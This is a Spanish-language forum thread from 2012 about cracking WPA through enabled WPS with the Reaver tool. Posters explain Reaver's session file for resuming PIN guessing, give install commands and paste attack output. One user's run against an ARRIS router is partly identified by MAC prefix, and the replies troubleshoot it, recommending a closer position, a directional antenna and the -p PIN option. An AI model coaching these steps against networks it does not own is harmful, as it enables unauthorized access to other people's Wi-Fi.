REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 1 Visitante están viendo este tema.

P4nd3m0n1um

#100
bueno si salto al 90% eso quiere decir que el pin comienza con 9998, pero es muy raro, el archivo dentro es algo asi:

7822
304
2
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011


el archivo es un .wpc, la primera linea indica la posición del comienzo del pin en el diccionario que viene debajo de la tercer linea. Entonces vas a la linea 7822 y encuentras que el pin inicia con 7820, pero ojo recuenda que el diccionario empieza en la linea 4 esconces al 7822 le sumamos 4 y nos da 7826:



luego de la linea 10005 comienza un nuevo diccionario, este es de 3 dígitos, entonces en la posición 304 del segundo diccionario encontraremos los números que continúan ojo sumandole los 4 que estan usados por registros osea que los proximos 3 numeros estan en el 308:



y la 3er linea que tiene solo un numero, ese es el numero final del pin.

Es un sistema muy raro el que usa el reaver, pero como veras solamente tiene un diccionario de 11.003 lineas a diferencia de las 100.000.000 que tendría que tener.

jose46lopez

Entonces el pin a comprobar seria este 78202962, segun tu ejemplo. Pues lo probare haber que tal, si no el pin entero los 4 primeros digitos y haber si hay suerte. Muchisimas gracias.

kupu88

Cita de: P4nd3m0n1um en 13 Marzo 2012, 15:39 PM
3.- Puedes actualizar el reaver bajando el modulo y colocandolo en la carpeta modules

¿Tienes los moludos del reaver actualizado?. Muchas gracias

P4nd3m0n1um

Cita de: kupu88 en 15 Marzo 2012, 17:38 PM
¿Tienes los moludos del reaver actualizado?. Muchas gracias

están en seguridad wireless, en módulos 3.4 o 3.0

Cleantesdeasso

yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...
"Que no!! q el hash hay q crakiarlo!!"

kupu88


P4nd3m0n1um

Cita de: Cleantesdeasso en 15 Marzo 2012, 17:54 PM
yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...

para back|track tenes en los repositorios:

apt-get install reaver

o

apt-get install reaver-wps

o en un terminal:

svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

si no comienza a descargar y da error instala svn. luego:

cd reaver-wps-read-only

cd src

./configure

make

make install

estando conectado.

el modulo de wifiway se puede extraer con el 7zip yo hice un par de módulos en windows..

Borito30

#107
por el momento ya va bien la instalacion
Estoy en contra del foro libre y la Sección de juegos y consolas (distraen al personal)

canastero

haber si alguien me dice si ago algo mal o esta bien todo y no da la contraseña solo me da el pin.La red la proprciona una compañia de andalucia la Mac comienza por 00:1D:CE:2A:XX:XX nombre de la red ARRIS-XXXX router ARRIS

+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
  • Sending EAPOL START request
    [!] WPS transaction failed, re-trying last pin
  • Trying pin 01255676
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WPS transaction failed, re-trying last pin
  • Key cracked in 193 seconds
  • WPS PIN: '01255676'
  • Nothing done, nothing to save.
    wifiway ~ #       

    Un saludo.

P4nd3m0n1um

#109
usa la etiqueta CODE:

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[!] WPS transaction failed, re-trying last pin
[+] Trying pin 01255676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 193 seconds
[+] WPS PIN: '01255676'
[+] Nothing done, nothing to save.
wifiway ~ #      


1.- estas en wifiway, en que wifiway? y con que versión de reaver-wps? cargaste el modulo de la nueva versión?
2.- que calidad de señal tiene el router? wash te ha dado que tiene WPS activado?
3.- se ven errores algo graves:

[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message


se envía el mensaje M2, el router contesta pero reaver no le entiende. Re-envía el mensaje, pero ojo envía un M2D??? cosa que desconozco que es. Segun la pagina de issue de reaver:

Cita de: project memberThe AP is vulnerable, but the received signal strength (RSSI) is almost -90dbm. This is very low. You will need to get closer to the AP or boost your signal with a directional antenna in order to perform this attack.

Cita de: project memberEl AP es vulnerable pero la señal (RSSI) es igual o menor a -90dbm. Esto es muy bajo. Usted tendrá que estar más cerca del punto de acceso o mejorar la señal con una antena direccional con el fin de llevar a cabo este ataque.

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred


quiere decir que se envió el EAPOL pero el router no respondió, por lo tanto esta en timeout!

[!] WPS transaction failed, re-trying last pin

esto quiere decir que probo un pin y el router no contesto a tiempo o no respondió nada.

simplemente el pin es erróneo o el router se bloqueo o se defiende, trata de hacer el ataque por pin como mostré post antes y pon -p 0125 y vemos sino lanza todo de nuevo, ha y si y tienes el reaver viejo, actualizalo.

El ataque debería ser limpio sin errores:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'XXXXXXXXXXXXXX'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.